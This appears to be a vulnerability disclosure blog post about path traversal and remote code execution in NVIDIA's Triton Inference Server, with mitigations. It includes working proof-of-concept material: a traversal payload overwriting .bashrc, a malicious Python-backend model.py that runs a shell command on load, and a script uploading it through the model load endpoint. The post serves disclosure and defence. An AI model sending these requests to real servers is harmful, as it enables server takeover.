What You Need To Know

  • Remote Code Execution is possible in nonstandard deployments of Triton Inference Server
  • Patches and security testing tools are available now

Read more below.

What Are Inference Servers? 

Inference servers are essential tools in making trained machine learning models accessible for practical use. These servers act as a bridge between the machine learning models and their end-users. Here’s how they fit into the machine learning lifecycle: 

  1. Training and Deployment: Initially, an individual or organization develops and trains a machine learning model for a specific purpose, such as predicting housing prices in a particular area. Once the model is trained, it is deployed onto an inference server. 
  2. Function of Inference Servers: An inference server is, in essence, a specialized API server. It accepts input data, passes it through the model, and returns the model’s outputs or predictions to the user. 

From a security perspective, inference servers are often the most exposed elements in a machine learning pipeline. Because of this exposure and their direct access to the machine learning models, they are valuable targets for attackers. 

One of the most popular inference servers in the world is the open source Triton Inference Server. It is optimized for cloud and edge deployments, and is offered by all major cloud providers as a standard way of deploying machine learning models to end-users. 

Vulnerability Discovery 

On September 20th, 2023, a member of the huntr community, l1k3beef, reported an issue in Triton in which a path traversal vulnerability led to the ability to overwrite any file on the server when Triton is run with a non-default configuration option. 

Although the initial proof of concept in the report did not work, it fit the pattern of vulnerabilities we have found and seen in the past. After some further experimentation, we at Protect AI were able to trigger the reported vulnerability with minor changes to l1k3beef’s original proof of concept.

Arbitrary file overwrites can often lead to remote code execution, allowing attackers to completely control the server. Common paths to code execution include overwriting SSH keys with the attacker’s keys, or overwriting the .bashrc file with malicious code that executes the next time a user logs into the system. These exploitation paths require an extra precondition, such as an SSH server running or a user logging in.

Vulnerability Details 

The Triton Inference Server exposes both HTTP/REST and GRPC API endpoints based on the standard inference protocols proposed by the KFServing project, and also implements a number of HTTP/REST and GRPC extensions to that protocol. These protocols provide endpoints to check server and model health, metadata, and statistics; additional endpoints allow model loading/unloading and inference. 
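
As a concrete illustration, the sketch below exercises a few of these HTTP/REST endpoints from Python. The host, model name, input name, and shape are placeholders for whatever your deployment actually serves, and it assumes the requests library is available:

import requests

TRITON = "http://localhost:8000"   # placeholder: your Triton HTTP/REST endpoint
MODEL = "mymodel"                  # placeholder: a model already loaded on the server

# Server and model health checks
print(requests.get(f"{TRITON}/v2/health/ready").status_code)          # 200 when the server is ready
print(requests.get(f"{TRITON}/v2/models/{MODEL}/ready").status_code)  # 200 when the model is ready

# Model metadata (platform, inputs, outputs)
print(requests.get(f"{TRITON}/v2/models/{MODEL}").json())

# Inference: names, shapes, and datatypes must match the model's configuration
payload = {
    "inputs": [
        {"name": "input__0", "shape": [1, 3], "datatype": "FP32", "data": [0.1, 0.2, 0.3]}
    ]
}
print(requests.post(f"{TRITON}/v2/models/{MODEL}/infer", json=payload).json())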

The discovered vulnerability lies in the API of one of these extensions, specifically the Model Repository Extension. When Triton is started with Dynamic Model Loading enabled via the non-default --model-control-mode explicit CLI argument, Triton becomes vulnerable to an arbitrary file overwrite attack. Prior to version 2.40 (NGC container 23.11), an attacker could craft an HTTP POST request to /v2/repository/models/<model_name>/load whose file: JSON parameter contained a path traversal such as the one seen below. 

"parameters": { 

"config": "{}", 

"file:../../root/.bashrc": "BASE64_ENCODED_FILE_CONTENTS" } 

File overwrite primitives are powerful vulnerabilities. In the context of Triton, one can silently replace running models with slightly different ones, or simply bring down the entire service by overwriting system files. Remote code execution is also possible by overwriting a user’s .profile or .bashrc files with, for example, a Python reverse shell which would execute the next time a user logs into the system. 

Expanding the Attack 

Protect AI’s Threat Research team wanted to see if it was possible to turn this file write primitive into a direct remote code execution vulnerability, without requiring a user to log into the system to trigger the malicious code. Initially, the plan was to use the vulnerability to write a pickle model with injected malicious code to the server, then load the model to trigger the code execution. However, after some research we found that Triton has the concept of backends:

“A Triton backend is the implementation that executes a model. A backend can be a wrapper around a deep-learning framework, like PyTorch, TensorFlow, TensorRT or ONNX Runtime. Or a backend can be custom C/C++ logic performing any operation (for example, image pre-processing)...” (from the Triton backend documentation: https://github.com/triton-inference-server/backend) 

The Python backend caught our attention: 

“The Python backend allows you to write your model logic in Python. For example, you can use this backend to execute pre/post processing code written in Python …” 

It dawned on us that we could potentially use this feature to get RCE by using the arbitrary file write vulnerability: 

  1. Write a Triton model configuration file that specifies the Python backend. 
  2. Write a Python script to execute a command that would spawn a reverse shell. 

To tell Triton what backend to use for a specific model, all you have to do is specify it in the model’s config file (config.pbtxt). Below is an example model config file using the Python backend: 

name: "mymodel" 

backend: "python" 

input [ 

name: "input__0" 

data_type: TYPE_FP32 

dims: [ -1, 3 ] 

...SNIP... 

With the Python backend, your “model” is simply a Python file which has to contain a class named TritonPythonModel, with three specific methods: 

class TritonPythonModel:

    def initialize(self, args):
        # Your code here
        return

    def execute(self, requests):
        # Your code here
        return

    def finalize(self):
        # Your code here
        return

By putting some code under the initialize method to execute an operating system command, and instructing Triton to load the model, we can achieve remote code execution. 
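
As a rough illustration of that idea, with a deliberately harmless command standing in for a reverse shell, a malicious model.py might look something like this:

import os

class TritonPythonModel:

    def initialize(self, args):
        # Runs as soon as Triton loads the model; a real attacker would place a
        # reverse shell here. This placeholder just drops a marker file.
        os.system("id > /tmp/triton_backend_poc")
        return

    def execute(self, requests):
        # Never needs to be called for the command above to run.
        return []

    def finalize(self):
        return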

Metasploit Module 

While we searched for the easiest way to turn the file overwrite into direct remote code execution without user interaction, we realized that creating a model.py file with malicious code didn’t require the file overwrite vulnerability at all: when Triton is started with --model-control-mode explicit, the load endpoint itself is capable of remotely uploading a malicious model by design. With that in mind, Protect AI’s threat research team created a Metasploit module to help security professionals test their Triton deployments. It gives the user two options for acquiring a remote shell. 

First, a fileless, in-memory remote shell is available with the module’s default options via the built-in functionality of the load endpoint that is exposed when Triton is started with the --model-control-mode explicit argument. This method of acquiring a shell works with the latest version of Triton as of the time of writing, because it abuses a feature of Triton rather than a vulnerability. 
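
Conceptually, that fileless path looks something like the sketch below: the load request itself carries a model configuration and the model.py contents as parameters, following the Model Repository Extension’s config and file: parameter convention, so nothing has to be written to disk by the attacker beforehand. The host and model name are placeholders, the payload is the harmless model.py from above, and the exact configuration a given Triton version accepts may vary:

import base64
import requests

TRITON = "http://localhost:8000"   # placeholder: your Triton HTTP/REST endpoint
MODEL = "uploaded_model"           # placeholder: name of the model being created

# The harmless Python-backend model from the previous section
model_py = b"""
import os

class TritonPythonModel:
    def initialize(self, args):
        os.system("id > /tmp/triton_backend_poc")

    def execute(self, requests):
        return []

    def finalize(self):
        return
"""

# Minimal model configuration (JSON form of config.pbtxt) selecting the Python backend
config = (
    '{"name": "uploaded_model", "backend": "python", '
    '"input": [{"name": "input__0", "data_type": "TYPE_FP32", "dims": [1]}], '
    '"output": [{"name": "output__0", "data_type": "TYPE_FP32", "dims": [1]}]}'
)

body = {
    "parameters": {
        "config": config,
        "file:1/model.py": base64.b64encode(model_py).decode(),  # version 1 of the model
    }
}

resp = requests.post(f"{TRITON}/v2/repository/models/{MODEL}/load", json=body)
print(resp.status_code, resp.text)  # a successful load runs initialize(), and with it the command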

Second, the module contains an option for the user to store their payload to disk by utilizing the file overwrite vulnerability. This method of acquiring a shell was patched in the latest version of Triton: 23.12.

Proof-of-concept code to test your own Triton deployments for the vulnerability is available in a GitHub repository managed by Protect AI. 

Mitigation 

  1. Upgrade to Triton version 2.40 (NGC container 23.11) or above. This prevents the file overwrite vulnerability; however, if you enable Dynamic Model Loading with the --model-control-mode explicit argument, remote code execution is still possible by design. 
  2. Follow Triton’s Secure Deployment Guide documentation, which was released in response to these findings. 
  3. Do not start Triton with the --model-control-mode explicit CLI argument in production, and audit existing production deployments to determine whether this flag is enabled (see the sketch after this list). 
  4. If you require the --model-control-mode explicit flag in production, you may be able to mitigate remote code execution risks by removing the Python backend from Triton and customizing Triton so it cannot load models stored in formats that allow deserialization attacks, such as pickle. 
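
One rough way to audit a deployment for item 3 is to ask the server to load a model name that does not exist and inspect the response. This is a sketch rather than a definitive check: the host is a placeholder, the error text differs between Triton versions, and the output should be interpreted manually. Broadly, an error saying that explicit model load/unload is not allowed suggests the flag is off, while an error that the model simply could not be found suggests dynamic model loading is enabled.

import requests

TRITON = "http://localhost:8000"   # placeholder: the Triton HTTP/REST endpoint being audited

# Request a load of a model name that should not exist in the repository.
resp = requests.post(f"{TRITON}/v2/repository/models/__audit_nonexistent__/load", json={})
print(resp.status_code)
print(resp.text)  # interpret manually, as described above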

Maintainer Response 

The Triton Inference Server maintainers were quick to respond and fix the file overwrite vulnerability. A Secure Deployment Guide was written to inform users of the inherent risks of using the --model-control-mode explicit argument. Additionally, a Security Bulletin was posted informing users of the issues outlined above.